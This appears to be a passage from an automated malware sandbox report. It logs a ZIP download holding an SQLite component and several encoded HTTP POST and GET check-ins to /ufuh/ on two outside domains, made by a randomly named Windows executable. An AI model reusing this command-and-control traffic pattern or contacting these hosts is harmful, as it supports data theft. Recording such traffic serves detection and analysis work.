                                Date: Mon, 20 May 2024 06:54:30 GMT
                                Last-Modified: Thu, 18 Jan 2018 20:17:17 GMT
                                Cache-Control: max-age=120
                                ETag: "m5a6100cds6cee7"
                                Content-type: application/zip; charset=utf-8
                                Content-length: 446183
                                Data Raw: 50 4b 03 04 14 00 00 00 08 00 86 13 59 4b 18 14 41 7f d2 04 00 00 eb 13 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 4c 94 ef 59 4c 94 ef 59 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6 a6 f6 05 72 de 54 76 0f 7b 73 61 2c bb a9 c1 e0 f0 d3 3d 33 4f bf e2 a7 1b 09 dc d9 d3 8c 3e 19 10 42 12 a2 bf ff fb e3 af 9f ff fc fd c5 ff d2 2a c0 cb 24 b6 cd c1 26 02 4c d2 9a 00 ef e1 54 13 0d e1 31 d8 09 3f 04 e3 95 35 0f 3c 0b f9 16 8f 69 55 46 f9 4b 4f 11 86 9e 1d 62 03 3e 73 55 38 d8 05 0e 30 5b af f0 01 8e c6 94 59 a6 59 db 79 24 af 7f 70 b6 d8 38 6b e0 4c d1 75 2b e8 c7 99 a8 35 27 87 70 62 87 00 ae f3 49 a7 44 09 de 9f 29 0d fe ed 74 16 17 07 c7 21 3b 8b 07 f9 fa 3a b2 de ec ab d0 b1 5b e1 13 9c 1d 7d 75 a7 74 02 14 a7 f9 23 80 e7 48 6a eb 81 23 7b 80 e1 c4 81 58 7a 32 7e 75 73 f8 7f 43 d1 7f 4c 17 61 16 4d 1d 90 60 50 3b d8 d8 7c 20 85 91 a0 9f 85 9f c4 39 36 62 b5 d4 20 5c de 26 06 12 c5 74 1f 59 9a ae df 1a b0 5a 8b 80 f3 4e 06 60 81 e5 a9 82 [TRUNCATED]
                                Data Ascii: PKYKAsqlite3.defUTLYLYuxd(ydrTv{sa,=3O>B*$&LT1?5<iUFKOb>sU80[YYy$p8kLu+5'pbID)t!;:[}ut#Hj#{Xz2~usCLaM`P;| 96b \&tYZN`nx(s$xP."Y,hH>qX'#xTFxTxfeM qnWiNFD"odvU.Qv(cD=`*ik4&^.5F*eA|9lKM.~fI;f1:)K)\`r[4>[Z|7AhEHmrR_pR6tI0y['#NxI7K P9]GlN1&>.T} L\Kbu=c`,By^G[A{par?q6v^aOd-O[v~N$$0^v)T+-pk=D3"3`=Ha,1F7 $zHzc"k9g'p-2YAz;M9@el~U&qf-Kcke]bXwo)Xacq;`LjytWw8{b%6ntRWT8Eq!x:gK>I-Ny{k57]v
                                May 20, 2024 08:54:30.702236891 CEST1236INData Raw: 0a c4 d1 95 d3 8e 93 dd 7b 1b 9d 04 ba 24 b9 e0 ba fb b9 88 74 30 7d 46 a6 4a 95 df 1b 9c 0c 1d 41 a6 c3 cc 6e a3 a7 85 b2 92 3b 9d db 69 f5 06 54 36 fc 83 0f b4 65 4f 19 60 ec 03 96 5e b6 b6 9f 78 8e 82 79 1e df 0e 61 b8 76 c3 25 d9 9b df 3c 26
                                Data Ascii: {$t0}FJAn;iT6eO`^xyav%<&bm&K\+<6`tjM07Q7/ba$cZO Z~l0l?A%PV3}VZHo,C"3&cdM<6-;M
                                May 20, 2024 08:54:30.706986904 CEST1236INData Raw: 2e a3 52 4e a8 b8 01 72 b2 37 e8 43 c5 45 93 f1 c2 3e cd 82 4f 95 5d 42 c5 c7 98 5a 75 08 b3 88 29 d0 ef 79 4d 79 69 3c 6e 0e b2 32 cd 0a ef a9 c4 91 16 6e 95 fb 6c 72 0c 76 9a 83 26 eb 63 c5 da fd bc ab 36 f4 9d 70 38 3c de fe d7 70 8c 71 c8 ef
                                Data Ascii: .RNr7CE>O]BZu)yMyi<n2nlrv&c6p8<pqR`kIFR!kVZxlHb07Bjyxr61b?!t+<77xYXMp82+.L2^?W]X%8_bH62W]/m3
                                May 20, 2024 08:54:30.712115049 CEST1236INData Raw: 95 6d c2 4b b5 43 1d 9a 0d ba 66 29 d1 de 66 24 d8 80 0b 33 56 0c 19 69 c0 5e d9 12 9d 77 69 65 1b cb 26 e6 3e a0 2c e6 2a 6b cb e7 c0 b7 70 d9 42 a1 86 83 49 14 6a 82 7a f5 3f 67 d5 b7 6a 29 90 5e 51 2b 42 0b ef ac fe 1d a6 65 fe 0a ff 4a 87 72
                                Data Ascii: mKCf)f$3Vi^wie&>,*kpBIjz?gj)^Q+BeJrr:ru4}CRSr(W0V 3Hf]t79<4NZ(g.>GZEw4+p|*Dh!{>aBH1/4km[v0
                                May 20, 2024 08:54:30.712131023 CEST1236INData Raw: 90 cb fd 3c e0 c6 d6 ea 9f e3 b7 e0 79 ab 38 43 1e b5 8a f6 ba 4f 79 af fa 23 18 47 a1 a6 96 6b d4 3a 2b da 84 ca e7 70 45 f5 cb aa 69 db e6 d0 4f b0 dd 35 49 ae da 08 ea dd 12 74 67 20 9b 30 ec ea 02 b0 b0 09 f8 64 c0 9b f2 70 3c f1 a9 5b e7 6d
                                Data Ascii: <y8COy#Gk:+pEiO5Itg 0dp<[mhmxN5y84HkwP_HF_NKnGMs0!}&<tzI-Z8[z]&hUW1d|e)QWv3<b%.\^KZmk
                                May 20, 2024 08:54:30.721599102 CEST1236INData Raw: ec da 74 b2 dc 4e d7 e8 89 c7 c8 29 ad 9d e4 da 81 4a c8 07 33 b0 13 45 29 b4 c0 e9 27 4b 9c f0 43 3e 21 cb 53 68 91 a3 c9 c3 ce fe 9a 3c 78 8a 62 0a 2f 99 17 a5 65 58 a0 e3 32 43 da f3 d9 a9 64 a3 25 0e ba 2d 63 68 88 e6 2c 54 f8 e7 a9 dd 7d 42
                                Data Ascii: tN)J3E)'KC>!Sh<xb/eX2Cd%-ch,T}BQr?*;C-4 !c<)=r_InwUfx1H0Xbj"CXq\U`:Wyp/O+@%&gS/)VrQ=b1\(pfU6
                                May 20, 2024 08:54:30.725428104 CEST1236INData Raw: 8f 92 11 d2 0f 99 70 8b 40 3e a1 a6 98 83 82 20 83 92 0e 28 e1 81 ba 40 e2 d8 c6 83 04 05 c0 88 0b 1a 26 ec 7d 70 aa 87 3c 6d 03 ca e1 3e b1 f5 a6 f9 be de f7 f1 84 c9 e2 eb 2b 95 87 79 21 b7 be 94 e4 4c 03 a1 0a 7e ec 48 5a 71 0c a0 a3 d4 d7 63
                                Data Ascii: p@> (@&}p<m>+y!L~HZqc^;BFYH0B]XVroHjGDIueqWS~mz&l{lkjz>L-%ORyZQJPxGCb{ 8+DQLlh)f9ma6T
                                May 20, 2024 08:54:30.725444078 CEST1236INData Raw: fa 1b 95 91 c9 a6 bf 66 2a 43 0f 07 5f 49 bd 50 b3 d8 cc 80 01 6c 0b fc dd 3f cb a8 e0 bc 33 aa 1c a2 6c ed 31 61 ff 77 b0 05 d4 63 36 f2 7c 6a 15 9a e3 4f 80 fc 35 e4 1a c4 71 22 dc 3e 34 27 84 81 d0 32 91 86 bc 8e 82 e4 e7 56 83 14 19 1d 4b 02
                                Data Ascii: f*C_IPl?3l1awc6|jO5q">4'2VKm6A%+<WJ_'T;xUG0@U(@VtCIAOG\*oaV 18nVS(:+p{Mh|\ATCfxN7"_%`C];o '
                                May 20, 2024 08:54:30.733045101 CEST1236INData Raw: 0d a4 39 ca d0 0e b9 36 1a e8 73 b5 71 47 49 00 c4 d9 82 64 f7 a1 aa c2 81 c0 a3 1b 0e 39 b8 3a fa 97 57 f1 94 42 ea db b9 3c 4b 52 03 cb 82 ef fd 9a 9d b0 01 4b 5b 30 3d 78 39 6e ab a0 6c e3 c8 68 d5 ea e9 e4 dd aa 75 00 bf ba 70 e0 be aa 82 64
                                Data Ascii: 96sqGId9:WB<KRK[0=x9nlhupdhP/.9R>@JkxC{1W|OR0(^:Xdn?0/m$jG&)i2Xe/9FOiu{]$eE'mR"-X,Hm*+6"0`$fx)Shdu0lL%
                                May 20, 2024 08:54:30.733062029 CEST1236INData Raw: 49 0d e5 e8 26 ba e4 32 6a d8 a0 89 ff 36 c6 5a 22 9e 08 fd 05 86 03 3b a9 1c 67 6c 5e c5 2c c8 09 60 a6 03 08 1c a2 de 71 38 da 39 26 f5 f4 8c c3 78 d8 80 f1 f7 d0 53 1c 1b 03 a1 52 43 9d 11 8e c3 8d 38 0e 8b 8e 1b 7a bc 04 5d 7e ce d7 47 9e f8
                                Data Ascii: I&2j6Z";gl^,`q89&xSRC8z]~GZC&Yz_%0m0R;~fPh4prYZ+jy6PYVx>VVExce)<(`>U5`SUO7gY7"NS~;QtX1FcdN
                                May 20, 2024 08:54:30.733076096 CEST1029INData Raw: 9c 06 7c 7d 61 87 b2 3a 55 b7 af a8 75 96 d2 ac 52 f7 36 ab f0 40 73 be dc 60 97 6b ed a5 6e e9 0b 29 04 12 6f 49 6f 69 d6 43 d6 c0 4d 78 70 98 04 34 ad 34 6b 79 02 81 15 e4 eb 45 6d 31 43 48 01 00 b9 3c 41 57 78 a4 4d b0 78 cc 14 b0 33 90 e2 5e
                                Data Ascii: |}a:UuR6@s`kn)oIoiCMxp44kyEm1CH<AWxMx3^Ye?X=Z\Ly*~k J6"`/.,+B%A*}`$_xq,43K?m]3Lc8}_$m*<Ci>OiON}$'WH


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.224916854.38.220.85802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:54:55.612392902 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 2161
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kinkynerdspro.blog
                                Origin: http://www.kinkynerdspro.blog
                                Referer: http://www.kinkynerdspro.blog/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 [TRUNCATED]
                                Data Ascii: 84O0=S8onh96WtuR/E2qb2eLSGtZGxWnKI3xhHwA2KNEgeg4YITCVWEyzuL9Guw7iTnwVr/xYklmTobgnKYpQWaWg9vWcOQhW8ZgUsORrXi998+VpcxcnMOqRb21A1AizZiOSC50RDTWAgmDkFI9vXL9PV/AyMdWc0uBd/JPp2GVukbCk2hogum3pQBLbMfCFbkwLO6iKoFJSped7JrsXgLlaWMmGfSN+L6zcx7X395UkFS+iAOmDXb3kf0bVq2QIYnWKvtWHEHvQ9sCRwxfhjKMlzoHZGufx9PXR6xqD9VorQCM5Rx1qMssOaQnCkgcKpCosiiTiDi3vZCOp9A0mfyqWuXqeMyuOHd9aFLQYFq0ZfNiPhZDVabL9o1k6Sy4RShe0aOqWYNsXIAxVsVJ5jQidcIww9K0uYI6nbr/QRXFRS31On9a59ERp4xDBfnW5gLHSkkVz8k6UFeBhpo/6tHzlv8bHTaZ6kkXFcRnzyjcYQS2Cq1EUBPx7VFgqjnmVNt7PvOgxauqQE/soFQFT0MZmiqZJcj099bXK+sLyEvRARbHnaaiUfbcSQiIaP1mX/HBcdnCGC9T3oeJaEs/jcmMtoSf9EzzB2SB7WDglbG3h6CLw5LuCZSjW4reiuLGCWBtoS3AnjH6AwrfOWU/KUa7Zmj2cq8W1kNxYzfY2iQPpeM1nrID4kpI1308/+PsBOdXzMxpELOmttmxNfjMKcCzjjdrDadQLX38yoIEtGjflKN9tEzATE77AEHs7qP6ae9iiB3pcfwCR61tQmgQopch+VrVNvIn9PYmqhEfnXu/sFRW1/+77qiJee3kzUDAPhKbgvHdQ/Rhhddt+uNnsu9oUnjXkPup5K360RZSaZB8NDf6nt6/ZbWeY7W9VfgJwZgBjqAcghjg1eVl3Lq6pKt01tAqz9qmJsFU0dn6bA/F1IccVFUvMrFH/JX/rhMzkHCFbfyFpS0t7jqoWNPf90AsRDau0G8eF2y09/0DEUTmO7LFsMHh [TRUNCATED]
                                May 20, 2024 08:54:55.621912003 CEST229OUTData Raw: 2b 4f 64 30 55 36 34 58 31 67 43 34 39 31 6d 4d 7a 7a 52 2b 56 62 68 45 6c 36 4f 43 6a 6c 56 6e 33 58 79 4d 2b 56 73 57 77 78 78 48 72 41 46 75 6c 6a 4c 45 4d 4c 51 51 4a 51 33 55 6b 34 58 4e 59 55 33 57 52 39 66 50 35 6f 66 43 49 48 79 45 4c 47
                                Data Ascii: +Od0U64X1gC491mMzzR+VbhEl6OCjlVn3XyM+VsWwxxHrAFuljLEMLQQJQ3Uk4XNYU3WR9fP5ofCIHyELGliUI4h2W1u13hDoVnK2QkMZE51eH3sBG1U9mmCrfVH8X1C/s8gj+QsGwgZEl3fb8m0N/juqTWahQZbXBndq8ieyjyDsLwIvHzSjo4GEWaNnuAMYT5u/+8D2+iFDsJjxbQPzacdjoBe2/GB+GLqf


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.224916954.38.220.85802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:54:58.129992962 CEST740OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 201
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kinkynerdspro.blog
                                Origin: http://www.kinkynerdspro.blog
                                Referer: http://www.kinkynerdspro.blog/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 31 53 62 33 4b 66 53 41 39 5a 47 6c 32 6e 4b 47 58 78 6e 48 33 49 2b 4b 49 39 39 65 52 77 59 49 6d 2b 56 57 32 61 7a 2b 62 39 46 6b 51 37 63 65 48 78 66 72 2f 77 4a 6b 6e 79 54 6f 62 30 6e 46 62 42 51 48 4c 57 6a 69 76 57 65 46 77 68 62 38 5a 73 6e 73 4f 74 37 58 6a 46 39 38 39 42 70 66 31 41 6e 4a 74 43 52 4c 32 31 5a 2b 67 69 6b 5a 69 79 39 43 35 6b 6a 44 53 61 41 67 58 50 6b 46 64 78 76 51 63 4a 50 63 66 41 7a 57 74 58 6f 31 74 6b 6d 36 70 58 31 71 31 30 4c 6c 4b 57 68 39 7a 45 32 73 77 50 59 47 6a 6a 4c 56 4c 57 4c 64 57 31 6e 59 41 3d 3d
                                Data Ascii: 84O0=S8onh96WtuR/E1Sb3KfSA9ZGl2nKGXxnH3I+KI99eRwYIm+VW2az+b9FkQ7ceHxfr/wJknyTob0nFbBQHLWjivWeFwhb8ZsnsOt7XjF989Bpf1AnJtCRL21Z+gikZiy9C5kjDSaAgXPkFdxvQcJPcfAzWtXo1tkm6pX1q10LlKWh9zE2swPYGjjLVLWLdW1nYA==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.224917054.38.220.85802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:01.004695892 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 3625
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.kinkynerdspro.blog
                                Origin: http://www.kinkynerdspro.blog
                                Referer: http://www.kinkynerdspro.blog/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 46 57 61 62 79 72 66 53 58 74 5a 48 38 32 6e 4b 49 33 78 6a 48 77 41 2b 4b 4e 45 67 65 6c 55 59 49 56 57 56 52 55 79 7a 74 4c 39 46 69 51 37 69 54 6e 77 55 72 2f 55 46 6b 6c 61 70 6f 59 59 6e 4b 63 46 51 57 64 4b 67 74 2f 57 63 42 77 68 55 38 5a 73 79 73 4f 64 33 58 6a 42 45 38 39 5a 70 66 6e 59 6e 50 64 43 4f 56 6d 31 5a 2b 67 69 6f 5a 69 7a 75 43 35 38 37 44 57 58 48 67 68 4c 6b 47 34 39 76 41 4c 39 4d 58 2f 42 34 49 64 57 6f 30 75 39 73 2f 4a 50 58 32 47 77 46 6b 62 4f 6b 33 30 38 67 75 68 72 71 4d 68 4c 55 53 66 43 46 56 45 77 4a 4f 36 6a 56 6f 46 4a 53 70 65 4a 37 47 62 73 58 67 4b 6c 64 56 38 6d 47 44 43 4e 6e 50 36 75 6c 78 37 53 55 39 34 6c 54 47 68 53 69 42 4d 4f 44 47 62 33 6b 4f 30 61 65 71 32 51 2f 44 33 57 67 76 70 37 34 45 48 66 36 39 73 43 52 77 33 4c 68 31 2f 34 6c 36 59 48 5a 4f 4f 66 79 76 50 58 53 36 78 75 78 39 56 4d 72 51 47 59 35 51 42 46 71 64 4f 30 42 56 41 6e 42 67 67 63 49 74 43 70 32 69 6a 2f 45 44 69 2f 4a 5a 42 47 70 39 [TRUNCATED]
                                Data Ascii: 84O0=S8onh96WtuR/FWabyrfSXtZH82nKI3xjHwA+KNEgelUYIVWVRUyztL9FiQ7iTnwUr/UFklapoYYnKcFQWdKgt/WcBwhU8ZsysOd3XjBE89ZpfnYnPdCOVm1Z+gioZizuC587DWXHghLkG49vAL9MX/B4IdWo0u9s/JPX2GwFkbOk308guhrqMhLUSfCFVEwJO6jVoFJSpeJ7GbsXgKldV8mGDCNnP6ulx7SU94lTGhSiBMODGb3kO0aeq2Q/D3Wgvp74EHf69sCRw3Lh1/4l6YHZOOfyvPXS6xux9VMrQGY5QBFqdO0BVAnBggcItCp2ij/EDi/JZBGp9CcmdTqWuHqZYiuKN4leFLIHFqxkfOmPgLrVOIz601lQVy4bERfLaNGoYMgXJx5VtR95oH+eUYw35K0DD46zbrrYRX5BSCJOnNa58iNukxCJSHWv67GVkkVN8mjhFMRhprX6uVrlv8bEWaZgqEb3cRr/yg4IQUSCrmcUBMp7OVgq5XmSU977vOFKauztEPIoAGhT2OxmrqZPRD08y7XX+sbyErQLRbvnUfaUe4ESfCIeDVmE/HB6dnOCC9DNocdaEt/jUHMtlyf4GzzFySANWDp4bGKM6Gfw5veCfjjWiLeggbGCYhtwSztajF/3wp/OXlvKca7e5D2bo8W219wBzfI2iQTpePln3pD4yII1+k89wvsHbtbTMxY9LLK9tgBNf3gKVgrkvNqpMtQRdX8OoIEpGh/TK4JtEHUTI/PDGns89f6NQdjdB356fyeB7CdQmggopPJ+VbVNvIn+PYmuhEDZXvPGFRW1/v77qQReVXk6WDAflKbEvHRi/QJPdZd+h5zsu9oXqzXnV+p+K3GtRZS4ZBgNDN2nsvjZawiY829VPAJxMwBuqAd9hmRyeXd3KbapJrIqhQqw/qmf+FYRdnm5A+N1IvIVEEDMq1H/DX/o48zxIiZHfyJDS19rjfMWL8n92BsQPKu1bMeb2y4e/07MUTfs7MRsMnh [TRUNCATED]
                                May 20, 2024 08:55:01.009654045 CEST1693OUTData Raw: 2b 4f 64 45 55 36 37 76 31 68 79 34 36 71 47 4d 32 70 68 2b 53 53 42 46 2b 36 4f 44 53 6c 55 4c 64 58 31 4d 2b 56 2b 65 77 33 41 48 72 42 31 75 76 77 72 45 66 61 41 63 68 51 33 59 67 34 57 39 75 56 47 32 52 38 74 33 35 6a 4e 61 49 4b 79 45 77 64
                                Data Ascii: +OdEU67v1hy46qGM2ph+SSBF+6ODSlULdX1M+V+ew3AHrB1uvwrEfaAchQ3Yg4W9uVG2R8t35jNaIKyEwdliZI4tKW1eP3lfWVTa2RUMZTLddD3tIB1UwmmDMfVe1X0+vs94j+SEGwQZLoXfZ7m1M/jiDTWSLQZLXBlZq/G6ygyDsEQIuOTSAnYCLWaolpBQ9dO2k7/rNnQJFsb/BRRGaS+1aqneugHdsL/+X6roOHZfQBQOfvg


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.224917154.38.220.85802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:08.747915983 CEST472OUTGET /ufuh/?84O0=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&-Hc=N8_LbDFHuLL4ejZ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                Host: www.kinkynerdspro.blog
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.2249172194.9.94.86802108C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe
                                TimestampBytes transferredDirectionData
                                May 20, 2024 08:55:13.867309093 CEST2472OUTPOST /ufuh/ HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate, br
                                Content-Length: 2161
                                Cache-Control: no-cache
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Host: www.xn--matfrmn-jxa4m.se
                                Origin: http://www.xn--matfrmn-jxa4m.se
                                Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                Data Raw: 38 34 4f 30 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 68 55 31 66 55 47 32 30 7a 71 78 71 52 4b 78 76 49 64 53 63 66 73 76 68 48 54 49 4f 46 66 77 69 77 67 37 47 6e 4f 59 62 7a 42 6a 50 62 74 73 5a 62 48 61 58 4b 35 4d 76 74 69 6d 67 4f 65 64 43 70 68 79 7a 42 54 5a 6a 5a 68 64 57 63 62 70 6a 64 59 7a 44 56 63 6f 68 72 77 35 6d 5a 37 59 49 58 67 69 67 4b 4c 2b 55 50 6f 37 47 46 37 7a 67 75 52 36 62 44 64 73 59 64 71 65 79 54 38 45 66 6f 73 61 54 68 6a 65 4c 45 38 31 78 46 78 59 4e 79 78 7a 63 79 68 69 7a 5a 77 31 4a 6c 6b 6a 53 32 78 70 49 6e 76 47 68 48 2f 37 55 57 42 2f 63 33 6b 74 39 7a 67 38 2f 6e 71 73 42 75 56 78 63 66 41 35 58 6d 55 6c 71 31 45 61 56 4d 69 6a 47 2b 54 38 55 43 6f 39 71 4a 5a 64 51 30 5a 57 72 71 6f 41 34 73 2f 31 32 4f 59 62 63 73 6d 48 70 4d 4f 4e 5a 37 54 72 5a 52 67 57 65 45 69 37 71 6a 79 48 77 61 43 2b 6e 7a 70 51 47 57 77 6d 6d 51 67 4b 64 4c 6e 45 4e 4e 6b 32 57 44 70 62 35 67 63 59 6c 4a 76 50 75 38 66 36 44 41 31 59 38 36 7a 31 61 37 68 72 57 4b 65 61 71 4b 52 42 2f [TRUNCATED]
                                Data Ascii: 84O0=EANcFG92XFNa6hU1fUG20zqxqRKxvIdScfsvhHTIOFfwiwg7GnOYbzBjPbtsZbHaXK5MvtimgOedCphyzBTZjZhdWcbpjdYzDVcohrw5mZ7YIXgigKL+UPo7GF7zguR6bDdsYdqeyT8EfosaThjeLE81xFxYNyxzcyhizZw1JlkjS2xpInvGhH/7UWB/c3kt9zg8/nqsBuVxcfA5XmUlq1EaVMijG+T8UCo9qJZdQ0ZWrqoA4s/12OYbcsmHpMONZ7TrZRgWeEi7qjyHwaC+nzpQGWwmmQgKdLnENNk2WDpb5gcYlJvPu8f6DA1Y86z1a7hrWKeaqKRB/ggH1ngkjbmnacjHcRIdhoMMJ9UcsuxAkv+1nlgkVq/iIxTlrj7CSiqxS/Tx1Y2guXjKMaun/W6pMiK9Kh5M6vQ3UDSvifYcVffwjKSM5ViWcnzSdhdipgYGyHG0e1TmQnoRqSDmBMiu/AWbPBAUgN4U5jirDKxvvKp9AJabH8khUGfENgciKOOrn0XgjqGuYv6MHbTrGahZkApWLnj/ZP3cYqGWzPhd3a0ZdBgLWq+JqEdiDzF8MiQ7h/WUGEDuL1gbin2R4lZIowjzjLZZ0x7ZpHL3eTF2eA2fH0MDJ8VrzWRsFT1yWRiMPBl6LS3apgWnsMCMQy9FraggbGR22n/CpjX973vD+rP7hIZ9TlCBD65reY8V+PQ3unF5T7qgxDZXCsGrAyrEyiS3ddcEIbSIGsc5OZwRCG4OlMsJQeGF6C6P1MJrO9ki+bsePp1mLBAi5NErumAtiGO9LLltjhsfBkrwCUgRWr0hdf+3hBNQVKjRmNoPPcHClfzZt1XLtQGGubui4sATmXJSoSCn7G5sRRLnALr4PQ51av2S0+OwLzlIfVckj+xIIgTYzcSBYaKP+RBfp5LMeN9kJT89CH7/lnZN1srKOisczcmPebg8P9e8etgq6gjPlQuCkJBK16uT9ZaCGdZ68umA/dNVi3YxpG9qdhh0Twp [TRUNCATED]
                                May 20, 2024 08:55:13.876796007 CEST235OUTData Raw: 36 44 4b 79 37 68 7a 4c 46 58 32 32 6b 47 6a 2b 55 36 50 34 54 73 57 4e 50 49 41 62 75 62 73 53 48 53 63 65 71 53 57 52 4d 77 76 55 2b 4e 75 59 2b 44 56 6a 2f 51 57 54 64 64 37 56 42 73 67 36 6b 30 78 2b 7a 74 65 78 69 31 66 4d 71 55 46 53 43 47
                                Data Ascii: 6DKy7hzLFX22kGj+U6P4TsWNPIAbubsSHSceqSWRMwvU+NuY+DVj/QWTdd7VBsg6k0x+ztexi1fMqUFSCG3aYo97em5Rc5bml1gHB07CQo+MHM6Xbkboah3cdkYXqrtXdXGb/vHuW7wpCPGsGWIsc0dIitiuP7bpeXQUqDxsKjPtO6PAoWRUIBkQNb4JBVEDY5fEQ26StEYEURAmR4OcYKx4E1KcPf1HxzBwK9Cea31
                                May 20, 2024 08:55:14.517338991 CEST1236INHTTP/1.1 200 OK
                                Server: nginx
                                Date: Mon, 20 May 2024 06:55:14 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Powered-By: PHP/8.1.24
